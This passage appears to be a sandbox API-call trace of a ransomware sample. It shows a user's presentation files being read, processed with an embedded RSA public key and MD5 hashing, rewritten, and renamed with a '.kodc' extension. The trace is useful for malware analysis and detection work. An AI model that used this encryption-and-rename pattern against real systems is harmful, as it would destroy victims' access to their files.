dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d0a8 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.371] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x8007, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x8007, lpOverlapped=0x0) returned 1 [0098.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.372] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x800c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.372] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.372] CloseHandle (hObject=0x5cc) returned 1 [0098.381] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IrCnDHvtRyHUHGtShK.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ircndhvtryhuhgtshk.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IrCnDHvtRyHUHGtShK.ppt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ircndhvtryhuhgtshk.ppt.kodc")) returned 1 [0098.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.382] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.383] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1273ac70, ftCreationTime.dwHighDateTime=0x1d5c4d0, ftLastAccessTime.dwLowDateTime=0x4bed5fb0, ftLastAccessTime.dwHighDateTime=0x1d5c1a5, ftLastWriteTime.dwLowDateTime=0x4bed5fb0, ftLastWriteTime.dwHighDateTime=0x1d5c1a5, nFileSizeHigh=0x0, nFileSizeLow=0x120a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JamfXqUN_6vJZo.pps", cAlternateFileName="JAMFXQ~1.PPS")) returned 1 [0098.383] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JamfXqUN_6vJZo.pps") returned=".pps" [0098.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JamfXqUN_6vJZo.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jamfxqun_6vjzo.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.383] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=73894) returned 1 [0098.383] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.386] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12080, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.386] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.387] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x120a6, lpOverlapped=0x0) returned 1 [0098.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.387] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.388] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.388] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.388] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.388] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.388] GetLastError () returned 0x0 [0098.388] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.388] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.389] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.389] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.389] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x120b0) returned 0x9ba4d90 [0098.389] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d0a8 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d0f0 [0098.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.390] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa00 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a9e8 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.391] GetCurrentThreadId () returned 0x42c [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ec98 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.391] GetCurrentThreadId () returned 0x42c [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa18 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d0f0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 